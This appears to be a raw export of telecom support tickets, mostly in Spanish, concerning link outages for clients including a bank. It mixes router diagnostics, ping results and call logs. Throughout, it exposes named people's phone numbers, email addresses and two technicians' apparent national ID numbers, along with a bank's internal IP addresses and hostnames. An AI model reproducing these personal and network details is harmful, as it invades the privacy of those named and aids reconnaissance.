MAY 21 09:53:14.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:53:17.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:53:18.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:53:32.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:53:33.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:53:35.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:53:36.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:53:50.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:53:51.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:53:54.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:53:55.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:54:23.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:54:24.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:54:27.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:54:28.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:54:36.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:54:37.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:54:40.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:54:41.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:55:12.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:55:13.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:55:16.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:55:17.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:55:50.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:55:51.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:55:53.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:55:54.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:56:24.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:56:25.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:56:28.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:56:29.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
CC_BANRURAL_GT_AGENCIA_0025#
SHOW CLOCK
09:59:38.761 UTC SAT MAY 21 2022
CC_BANRURAL_GT_AGENCIA_0025#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.16.195.161           3   084F.0AC8.668F  ARPA   GIGABITETHERNET0/0.1
INTERNET  10.16.195.167           -   D867.D9B1.EE20  ARPA   GIGABITETHERNET0/0.1
INTERNET  10.16.195.169           3   C0FF.A821.D3D9  ARPA   GIGABITETHERNET0/0.1
INTERNET  10.16.195.193           0   084F.0AC8.668F  ARPA   GIGABITETHERNET0/1
INTERNET  10.16.195.200           -   D867.D9B1.EE21  ARPA   GIGABITETHERNET0/1
INTERNET  10.130.25.17            -   D867.D9B1.EE23  ARPA   VLAN1
INTERNET  10.130.25.22            0   F08E.DB17.8F4E  ARPA   VLAN1
INTERNET  10.160.25.126           -   D867.D9B1.EE23  ARPA   VLAN1
CC_BANRURAL_GT_AGENCIA_0025#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/8900538T/_/
GI0/0.1                        UP             UP       WAN PRINCIPAL/_/8900538T/_/
GI0/1                          UP             UP       WAN REDUNDANTE/_/8901755T/_/
FA0/0/0                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
FA0/0/1                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
FA0/0/2                        ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
FA0/0/3                        UP             UP       LAN DEL CLIENTE
BV1                            DOWN           DOWN
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       LAN DEL CLIENTE
CC_BANRURAL_GT_AGENCIA_0025#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         UNASSIGNED      YES NVRAM  UP                    UP
GIGABITETHERNET0/0.1       10.16.195.167   YES NVRAM  UP                    UP
GIGABITETHERNET0/1         10.16.195.200   YES NVRAM  UP                    UP
FASTETHERNET0/0/0          UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
FASTETHERNET0/0/1          UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
FASTETHERNET0/0/2          UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
FASTETHERNET0/0/3          UNASSIGNED      YES UNSET  UP                    UP
BVI1                       UNASSIGNED      YES UNSET  DOWN                  DOWN
LOOPBACK5                  10.212.120.39   YES NVRAM  UP                    UP
VLAN1                      10.160.25.126   YES NVRAM  UP                    UP
CC_BANRURAL_GT_AGENCIA_0025#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN BANRURAL 10.16.195.200
  PING 10.16.195.200: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.16.195.200 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 45/48/58 MS
RUTA IP:
PE: 10.179.28.74
DISPLAY IP ROUTING-TABLE VPN-INSTANCE BANRURAL 10.16.195.200
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : BANRURAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.16.195.200/32  DIRECT  0    0                 0.0.0.0         VLANIF2249</t>
  </si>
  <si>
    <t>F4572264</t>
  </si>
  <si>
    <t>ENLACE OPERATIVO  EN ESTE MOMENTO QUE SE VERIFICA
ZAPOTE#PING 190.143.188.154 REP 1500 SI 1000
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 1500, 1000-BYTE ICMP ECHOS TO 190.143.188.154, TIMEOUT IS 2 SECONDS:
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
SUCCESS RATE IS 99 PERCENT (1496/1500), ROUND-TRIP MIN/AVG/MAX = 4/9/216 MS
ZAPOTE#
PE 10.184.12.9
ZAPOTE#PING 190.143.188.154 REP 1500 SI 1000
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 1500, 1000-BYTE ICMP ECHOS TO 190.143.188.154, TIMEOUT IS 2 SECONDS:
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
SUCCESS RATE IS 99 PERCENT (1496/1500), ROUND-TRIP MIN/AVG/MAX = 4/9/216 MS
ZAPOTE#</t>
  </si>
  <si>
    <t>F4571771 SE TIENE FALLA EN DICTAMEN TECNICO EN EL CUAL SE PROCEDERA A VALIDAR LOS INCIDENTES SE PORCEDE CON CIERRE SE DA SEGUIMIENTO CON TTK F4571771</t>
  </si>
  <si>
    <t>F4572308</t>
  </si>
  <si>
    <t>--- MARCO ROSAS 55312227 (CLIENTE) INDICA QUE TUVO UN EVENTO, SIN EMBARGO; EN LA ACTUALIDAD EL SERVICIO SE ENCUENTRA DE MANERA CORRECTA, AUTORIA EL CIERRE DEL TICKET.---
RESULTADO: CONTESTADA
NOMBRE: 55312227
NÚMERO: 55312227
INICIO: HOY, 07:50
FIN: HOY, 07:53
DURACIÓN: 2:20
ID DE LLAMADA: 1001310005
...</t>
  </si>
  <si>
    <t>F4572310</t>
  </si>
  <si>
    <t>F4572324</t>
  </si>
  <si>
    <t>SE LLAMA EMANUEL CARLDERON 41551402  CONFIRMA EQUIPOS ENCENDIDOS, APLICARON REINICIO PERO ENLACE NO LEVANTO.</t>
  </si>
  <si>
    <t>F4572342</t>
  </si>
  <si>
    <t>SE INTENTA CONTACTAR A GERENTE BYRON CETINO 30036992  CLIENTE NO RESPONDE, ES NECESARIO QUE PUEDAN BRINDAR AUTORIZACIÓN A TECNICOS PARA BAJAR EL EQUIPO MERAKI DE DONDE SE ENCUENTRA UBICADO PARA REALIZAR PRUEBAS, PARA VALIDAR QUE EQUIPO NO SE ENCUENTRE DAÑADO, NO SE LE BRINDA PERMISOS A PERSONAL TECNICO EN SITIO.
[16:13] OMAR ALBERTO OCHOA HID
1001427107
COLA:
NOMBRE: A: 30036992
NÚMERO: 55280199
DURACIÓN: 0:01:06
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: OALBERTO.OCHOA
FECHA Y HORA LOCALES: 21/05/2022 16:13:39</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GABRIEL MORALES AL 58433926 NO RESPONDE ENVIA A BUZON SE INTENTARA LUEGO **
ID 1001693129
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GABRIEL MORALES AL 58433926   NO RESPONDE ENVIA A BUZON, SE INTENTARA LUEGO **
ID 1001818596
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GABRIEL MORALES AL 58433926   NO RESPONDE ENVIA A BUZON, SE INTENTARA LUEGO **
ID 1001807944
**</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO A CLIENTE, QUEDAMOS A LA ESPERA DE CONFIRMACIÓN.
DE: OMAR ALBERTO OCHOA HID &lt;OALBERTO.OCHOA@CLARO.COM.GT&gt;
ENVIADO: LUNES, 23 DE MAYO DE 2022 19:22
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; RICARDO ENRIQUE ARGUETA GIRON &lt;RICARDO.ARGUETAG@SOMOSCMI.COM&gt;; WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; ERICK SANCHEZ &lt;ERICK.SANCHEZS@SOMOSCMI.COM&gt;; JAIME JOSUE HERNANDEZ CASTILLO &lt;JAIMEJ.HERNANDEZ@CLARO.COM.GT&gt;; C639_GT1@INTERNO-GT.CAMPERO.COM &lt;C639_GT1@INTERNO-GT.CAMPERO.COM&gt;; C639-GT@CAMPERO.COM &lt;C639-GT@CAMPERO.COM&gt;; SOC EMPRESAS &lt;SOCEMPRESAS@CLARO.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; BELTER FRANCISCO AGUIRRE TELLEZ &lt;BELTER.AGUIRRE@SOMOSCMI.COM&gt;; CARLOS RENE PORTILLO SEN &lt;CARLOS.PORTILLO@SOMOSCMI.COM&gt;ASUNTO: RE: SEGUIMIENTO A TICKET SD1127804 // C639
BUENAS NOCHES ESTIMADO CLIENTE,
PODEMOS PLANIFICARLO PARA ÉL DÍA DE MAÑANA 24 DE MAYO, QUEDAMOS A LA ESPERA DE SU CONFIRMACIÓN PARA REALIZAR LA COORDINACIÓN Y ENVIAR A NUESTRO PERSONAL TÉCNICO.
SALUDOS CORDIALES,</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GABRIEL MORALES 58433926   PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001716568 - 1001717120</t>
  </si>
  <si>
    <t>***--- HORARIOS QUE COMPARTE CL --*-*
.    HORARIOS PREFERENCIALES  DE 7.00 A 8.30 AM   O DE 15.00 A 17.00 PM O AL CIERRE DEL TURNO</t>
  </si>
  <si>
    <t>SE LE LLAMA A CLIENTE GABRIEL MORALES 58433926   ID: 1001328962 / 1001329039 / 1001329103
CL COMENTA QUE EL SERVICIO SIGUE DOWN, SE DEJA EN CONFERENCIA CON JOSE OCHOA PARA PRUEBAS PENDIENTES | WIP</t>
  </si>
  <si>
    <t>SE CONTACTA A CLIENTE GABRIEL MORALES  58433926 INDICA QUE NO SE ENCUENTRA DE TURNO, EL GERENTE DE TURNO ES 30036992 BYRON CETINO, SE CONTACTARÁ.
1001426625
COLA:
NOMBRE: A: 58433926
NÚMERO: 58433926
DURACIÓN: 0:02:06
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 58433926
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: OALBERTO.OCHOA
FECHA Y HORA LOCALES: 21/05/2022 16:11:31V</t>
  </si>
  <si>
    <t>F4572364</t>
  </si>
  <si>
    <t>CLIENTE UBICA EQUIPO ASMI EL CUAL NO SE ENCUENTRA ALARMADO
PWR - VERDE
SHDSL SYNC -  VERDE
ALM - APAGADO
CLIENTE NOS APOYA CON UBICAR LA PBX LA CUAL SI ESTA ENCENDIDA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE RICARDO 77440975 PARA REALIZAR PRUEBAS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE RICARDO CRUZ 77440975 Y 76474252 NO CONTESTA, SE LLAMARA NUEVAMENTE EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE RICARDO REALIZA PRUEBAS DE LLAMADAS ENTRANTES Y SALIENTES, NOS CONFIRMA SERVICIO OPERATIVO, SE PROCEDE CON EL CIERRE DE CASO
POSIBLE AFECTACION DE LADO DEL CLIENTE DE ENERGIA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4572384</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ATIENDE LESTER MARTINEZ QUIEN INDICA QUE GERENTE SE ENCUENTRA EN UNA REUNION Y LA ENCARGADA DE BODEGA SE ENCUENTRA EN HORA DE ALMUERZO POR LO QUE SOLICITA QUE SE LLAME NUEVAMENTE A LAS 14:30 PARA PODER APOYAR CON LA SOLICITUD
2001374727
COLA:
NOMBRE: A: 25041501
NÚMERO: 25041501
DURACIÓN: 0:01:59
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 25041501
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 26/05/2022 12:57:58</t>
  </si>
  <si>
    <t>*** SE ENVÍAN DATOS DE PERSONAL TÉCNICO A CLIENTE, A LA ESPERA DE QUE NOS CONFIRME AUTORIZADOS LOS ACCESOS ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 27 DE MAYO DE 2022 7:37
PARA: TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; TIC-TELE-TEC@BANRURAL.COM.GT &lt;TIC-TELE-TEC@BANRURAL.COM.GT&gt;; TIC POCASANGRE, BRYAN &lt;BRYAN.POCASANGRE@BANRURAL.COM.GT&gt;; TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;; TIC ORELLANA, FRANKLIN &lt;FRANKLIN.ORELLANA@BANRURAL.COM.GT&gt;; TIC-CALLCENTER@BANRURAL.COM.G &lt;TIC-CALLCENTER@BANRURAL.COM.G&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: BANRURAL -- ID 8901524T -- F4572384
ESTIMADOS BUEN DÍA,
SE HA GENERADO LO QUE ES UNA VERIFICACIÓN PROACTIVA REFERENTE AL ENLACE 8901524T (AGE337) UBICADO EN SAN DIEGO EDIF. MUNICIPAL DE SAN DIEGO ZACAPA. YA QUE SE HA PERCIBIDO INCONVENIENTES SOBRE ESTE SERVICIO.
ASIMISMO SE DESEA COORDINAR UNA VISITA TÉCNICA PARA LA VERIFICACIÓN DE LOS EQUIPOS, POR LO QUE SE SOLICITA DE SU APOYO SE PUEDA DAR AUTORIZACIÓN DE ACCESO PARA EL PERSONAL DESCRITO A CONTINUACIÓN, ASÍ COMO UNA FECHA Y HORARIO PARA PODER PROCEDER:
JONATHAN ANTONIO JUAREZ RAMIREZ   1962 12758 0101
MARCELO AUGUSTO RABBÉ ARCHILA       1998-65825-1901
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL GONZALEZ AL 57081768 - 23081000 EXT. 301690 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001545174- 2001545316
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL GONZALEZ AL 57081768 - 23081000 EXT. 301690 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001497599 - 2001497715
**</t>
  </si>
  <si>
    <t>F4572387</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE GERARDO GONZALEZ 3190-0598, SE LE COMENTA AL CLIENTE QUE EL E1 SE OBSERVA OPERATIVO, CLIENTE INDICA QUE SE ENCUENTRA HACIENDO PRUEBAS, SOLICITA SE LE LLAME EN 20 MINUTOS.
1001323776
COLA:
NOMBRE: A: 0050431900598
NÚMERO: 0050431900598
DURACIÓN: 0:01:42
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 0050431900598
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: SAQITZUNUN.COJTI
FECHA Y HORA LOCALES: 21/05/2022 09:05:48 A. M.</t>
  </si>
  <si>
    <t>F4572421</t>
  </si>
  <si>
    <t>SE LE LLAMA A WALTYER REYES ID:  1001379772
CONFIRMA SERVICIO OK, AUTORIZA CIERRE DE TKT, SE NOTIFICA A RAMOS.MARLON VIA SKYPE | WIP</t>
  </si>
  <si>
    <t>F4572460</t>
  </si>
  <si>
    <t>SE HABLÓ CON JEFFERSON ARCE/CLIENTE 2243-7253 SE LE PIDE APOYO CON TELS DE PR; PIDE SE LE ENVÍE CORREO HACIENDO LA SOLICITUD PARA LUEGO APOYARNOS.
ASUNTO: RE: ENLACE CAÍDO DE DF LO DE COY ID: 344400262</t>
  </si>
  <si>
    <t>NO SE HA TENIDO APOYO DE CNOC CLARO A LO DICHO EN CRONO ANTERIOR, SE LES HACE RECORDATORIO DE LO DICHO POR CLIENTE PARA ASÍ PROCEDER AL CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>F4572465</t>
  </si>
  <si>
    <t xml:space="preserve">				
	WO OPEN                                			6:57
1/4	LUIS SANDRES           	89904245	2.5 HORAS	9:27:00
2/4	FRANKLIN BUESO  	89904208	3 HORAS	9:57:00
3/4	MANUEL LARIOS   	31921638	5 HORAS	11:57:00
4/4	PASTOR RAMIREZ  	33910016	6 HORAS	12:57:00</t>
  </si>
  <si>
    <t>EM GESTION CON PERSONAL TECNICO, SE VEN ERRORES EN INTERFAZ WAN SE CAMBIARA NEGOCIACION PARA VALIDAR COMPORTAMIENTO YA QUE SE ENCUENTRA EN HALF DUPLEX</t>
  </si>
  <si>
    <t>F4572482</t>
  </si>
  <si>
    <t>SE TIENE NUMERO DE CONTACTO REMOTO , SE ESTA LLAMANDO 79438311 SIN EMBARGO NO SE LOGRA COMUNICACION.
ID
1001754819
COLA:
NOMBRE: A: 79438311
NÚMERO: 79438311
DURACIÓN: 0:01:15
ESTADO: MARCANDO
DETALLES: 79438311
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 23/05/2022 17:00:16</t>
  </si>
  <si>
    <t>EMILY SEGURA ATIENDE AL NUMERO 59331052  , SE CONFIRMA QUE ES TIENDA C669, SE SOLICITA APOYO PARA VLIDAR ESTADO DE LOS EQUIPOS, SIN EMBARGO INDICA QUE YA HABIA APOYADO ANTERIORMENTE Y QUE NO LOGRA UBICAR EL EQUIPO INDICADO CTC ADICIONAL LE INDICARON QUE ENVIARIAN TECNICO PERO NUNCA LLEGARON, POR LO CUAL SOLICITA QUE SE ENVIE PERSONAL TECNICO, SE SOLICITARA APOYO  PARA VALIDAR ESTADO DE LOS EQUIPOS Y MEDIO DE FIBRA YA QUE SE OBSERVA DOWN DESDE EL NODO HACIA PUNTO REMOTO. ATIENDEN HASTA LAS 20 HORAS, SI VAN A LLEVAR EQUIPO CLIENTE DEBE COORDINAR CON EL CENTRO COMERCIAL.
ID
1001756547
COLA:
NOMBRE: A: 59331052
NÚMERO: 59331052
DURACIÓN: 0:02:29
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 59331052
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 23/05/2022 17:06:55</t>
  </si>
  <si>
    <t>SE TIENE NUMERO DE CONTACTO REMOTO , SE ESTA LLAMANDO NUEVAMENTE 79438311 SIN EMBARGO NO SE LOGRA COMUNICACION.
ID
1001755632
COLA:
